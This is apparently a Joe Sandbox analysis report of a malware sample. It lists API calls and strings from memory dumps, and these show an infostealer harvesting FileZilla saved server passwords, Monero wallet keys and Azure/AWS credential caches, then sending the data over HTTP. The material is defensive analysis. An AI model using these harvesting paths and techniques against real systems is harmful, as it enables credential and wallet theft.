                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0fe7fb2ee22270c998e26c894170ffea5a957785b7747251868e20c266a647d
                              • Instruction ID: f758175060ee7be9e84801ed510bd8874bec2c0b6817e5ac7ae1905196fbc966
                              • Opcode Fuzzy Hash: f0fe7fb2ee22270c998e26c894170ffea5a957785b7747251868e20c266a647d
                              • Instruction Fuzzy Hash: 3E6159F3E082145FF7046A3CDD4536A7AD6DBD4320F2A853DEA88D7784E93998058392
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 040a853bcc1e8edb93ebaa3735500c78486a36cc02929a40c06fcf7a678608a0
                              • Instruction ID: a6eacbe5d46bde103824f6a9394e8d51ebf647dcf2fff86e077e9d85fc5e315e
                              • Opcode Fuzzy Hash: 040a853bcc1e8edb93ebaa3735500c78486a36cc02929a40c06fcf7a678608a0
                              • Instruction Fuzzy Hash: 8B5115F3A181145BF304AE2DDD4533ABBCAEBD4720F1A853DD6C8D3784E93999098392
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1169eb843dff448bc754f89156cb2f21af9af9e297b03bcb80034fc42c3d5f6
                              • Instruction ID: 377a529972cd808e2ff3f516f715a5f4690991336b7d01b7190f04026f6aa4aa
                              • Opcode Fuzzy Hash: c1169eb843dff448bc754f89156cb2f21af9af9e297b03bcb80034fc42c3d5f6
                              • Instruction Fuzzy Hash: 085168F3A082045FF348AE2DDCD577ABBD9EBD4320F26453DEA89D7784E93548018282
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b087f5be9f18b2b002f9f595c7c4c26685842132d509624f10e38dd50c31d12c
                              • Instruction ID: d2eedf5cb993dad1cab2c3b9631587f14fdbda09eff2b1d604ae4bfb4585e831
                              • Opcode Fuzzy Hash: b087f5be9f18b2b002f9f595c7c4c26685842132d509624f10e38dd50c31d12c
                              • Instruction Fuzzy Hash: 1D415AF3E083109BE704AE3DDD59766BED6DB90760F2B463DD689CB7C5E83589018281
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00A70DBA,00A70DB7,00A70DB6,00A70DB3), ref: 00A60362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A60369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A60385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00A60419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A60463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A60532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A60562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00A60571
                              • lstrcat.KERNEL32(?,url: ), ref: 00A60580
                              • lstrcat.KERNEL32(?,00000000), ref: 00A60593
                              • lstrcat.KERNEL32(?,00A71678), ref: 00A605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00A605B5
                              • lstrcat.KERNEL32(?,00A7167C), ref: 00A605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00A605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00A605E6
                              • lstrcat.KERNEL32(?,00A71688), ref: 00A605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00A60604
                              • lstrcat.KERNEL32(?,00000000), ref: 00A60617
                              • lstrcat.KERNEL32(?,00A71698), ref: 00A60626
                              • lstrcat.KERNEL32(?,00A7169C), ref: 00A60635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A70DB2), ref: 00A6068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 507d5faf8edc490bc8663a6c8a925203d4456bcb28d5c3f69a09287b05be769a
                              • Instruction ID: 9a1222a67cada758a26397cd7a9be188bf2c325a0fae1560c986f36186bcae0b
                              • Opcode Fuzzy Hash: 507d5faf8edc490bc8663a6c8a925203d4456bcb28d5c3f69a09287b05be769a
                              • Instruction Fuzzy Hash: A6D11F71910208ABDB04EBE4DE9AEEE7378FF64700F508519F106B7091EE74AA45CFA1
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A559F8
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A55A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A55B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0144F1D0,00000000,?,0144E5E8,00000000,?,00A71A1C), ref: 00A55E71
                              • lstrlen.KERNEL32(00000000), ref: 00A55E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A55E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A55E9A
                              • lstrlen.KERNEL32(00000000), ref: 00A55EAF
                              • lstrlen.KERNEL32(00000000), ref: 00A55ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A55EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00A55F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A55F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A55F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FBD
                              • HttpOpenRequestA.WININET(00000000,0144F290,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A55BF8
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00A55FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 5317dc6780af78db2e8eb7f69ea0d3bf459a40a3131064d6a56a4a445b733f92
                              • Instruction ID: 382a1e1835af416d3401ec9c1a86fe7c9d013073cfad687a64c403a3207b45c3
                              • Opcode Fuzzy Hash: 5317dc6780af78db2e8eb7f69ea0d3bf459a40a3131064d6a56a4a445b733f92
                              • Instruction Fuzzy Hash: 4D12C072920118ABDB15EBA0DE96FEEB378BF24700F504599F10A73091EF706A49CF65
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A5D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A5D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D208
                              • lstrcat.KERNEL32(?,00A71478), ref: 00A5D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D22A
                              • lstrcat.KERNEL32(?,00A7147C), ref: 00A5D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D24C
                              • lstrcat.KERNEL32(?,00A71480), ref: 00A5D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D26E
                              • lstrcat.KERNEL32(?,00A71484), ref: 00A5D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D290
                              • lstrcat.KERNEL32(?,00A71488), ref: 00A5D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D2B2
                              • lstrcat.KERNEL32(?,00A7148C), ref: 00A5D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5D2D4
                              • lstrcat.KERNEL32(?,00A71490), ref: 00A5D2E3
                                • Part of subcall function 00A6A820: lstrlen.KERNEL32(00A54F05,?,?,00A54F05,00A70DDE), ref: 00A6A82B
                                • Part of subcall function 00A6A820: lstrcpy.KERNEL32(00A70DDE,00000000), ref: 00A6A885
                              • lstrlen.KERNEL32(?), ref: 00A5D32A
                              • lstrlen.KERNEL32(?), ref: 00A5D339
                                • Part of subcall function 00A6AA70: StrCmpCA.SHLWAPI(01448C78,00A5A7A7,?,00A5A7A7,01448C78), ref: 00A6AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5D3B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 0070f6d5d807565d86c9019cb29d3345a9e545e0582ffb6dfed37d7026a93a76
                              • Instruction ID: 5adea99ac6c8026fe18fe893adf690145efe983e0e36d4902f9c42ed5bab932e
                              • Opcode Fuzzy Hash: 0070f6d5d807565d86c9019cb29d3345a9e545e0582ffb6dfed37d7026a93a76
                              • Instruction Fuzzy Hash: F9E1DB72910108ABCB04EBA4DE9AFEE7378BF64701F104559F507B7091DE35AA09CFA6
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0144D7A0,00000000,?,00A7144C,00000000,?,?), ref: 00A5CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A5CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A5CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A5CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A5CAD9
                              • StrStrA.SHLWAPI(?,0144D7D0,00A70B52), ref: 00A5CAF7
                              • StrStrA.SHLWAPI(00000000,0144D710), ref: 00A5CB1E
                              • StrStrA.SHLWAPI(?,0144DDC0,00000000,?,00A71458,00000000,?,00000000,00000000,?,01448C68,00000000,?,00A71454,00000000,?), ref: 00A5CCA2
                              • StrStrA.SHLWAPI(00000000,0144DF80), ref: 00A5CCB9
                                • Part of subcall function 00A5C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A5C871
                                • Part of subcall function 00A5C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A5C87C
                              • StrStrA.SHLWAPI(?,0144DF80,00000000,?,00A7145C,00000000,?,00000000,01448B48), ref: 00A5CD5A
                              • StrStrA.SHLWAPI(00000000,014489A8), ref: 00A5CD71
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B46), ref: 00A5C943
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B47), ref: 00A5C957
                                • Part of subcall function 00A5C820: lstrcat.KERNEL32(?,00A70B4E), ref: 00A5C978
                              • lstrlen.KERNEL32(00000000), ref: 00A5CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00A5CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 3919e9703542377821b8985cdf174dce943c942766d54d76f762d1fe43fbadbb
                              • Instruction ID: 7337a113b9f9ea99724755f1f2b5895c7f6a747a252ec354566c57cee6b70968
                              • Opcode Fuzzy Hash: 3919e9703542377821b8985cdf174dce943c942766d54d76f762d1fe43fbadbb
                              • Instruction Fuzzy Hash: F7E1DF72910108ABDB15EFA4DE96FEEB778AF24300F504159F50677191EF306A4ACFA1
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0144B788,00000000,00020019,00000000,00A705B6), ref: 00A683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A68426
                              • wsprintfA.USER32 ref: 00A68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68499
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: b493c9f2ef8596c020e5845febaa688caf82cf2f83373f84838c3945470fdb29
                              • Instruction ID: e4bd16a4a74e10f984f38dabfd5392159312ddb7862482aa0e0c5bee75a862dc
                              • Opcode Fuzzy Hash: b493c9f2ef8596c020e5845febaa688caf82cf2f83373f84838c3945470fdb29
                              • Instruction Fuzzy Hash: 728118B1910118ABDB28DB50CD95FEAB7B8FF58700F008699E109A6180DF74AB85CFE5
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00A64DCD
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A6492C
                                • Part of subcall function 00A64910: FindFirstFileA.KERNEL32(?,?), ref: 00A64943
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00A64E59
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FDC), ref: 00A64971
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A70FE0), ref: 00A64987
                                • Part of subcall function 00A64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A64B7D
                                • Part of subcall function 00A64910: FindClose.KERNEL32(000000FF), ref: 00A64B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A64EE5
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A649B0
                                • Part of subcall function 00A64910: StrCmpCA.SHLWAPI(?,00A708D2), ref: 00A649C5
                                • Part of subcall function 00A64910: wsprintfA.USER32 ref: 00A649E2
                                • Part of subcall function 00A64910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A64A1E
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,0144F1F0), ref: 00A64A4A
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,00A70FF8), ref: 00A64A5C
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,?), ref: 00A64A70
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,00A70FFC), ref: 00A64A82
                                • Part of subcall function 00A64910: lstrcat.KERNEL32(?,?), ref: 00A64A96
                                • Part of subcall function 00A64910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A64AAC
                                • Part of subcall function 00A64910: DeleteFileA.KERNEL32(?), ref: 00A64B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 9ac0890f21d748586928f5e5e460c4bd24e4fcafcf861a96f8e4238688db2f39
                              • Instruction ID: 2ccf2708a2d77d8957aa16eee25f124ef87508bb8a9b530f64bcd5fb610b3058
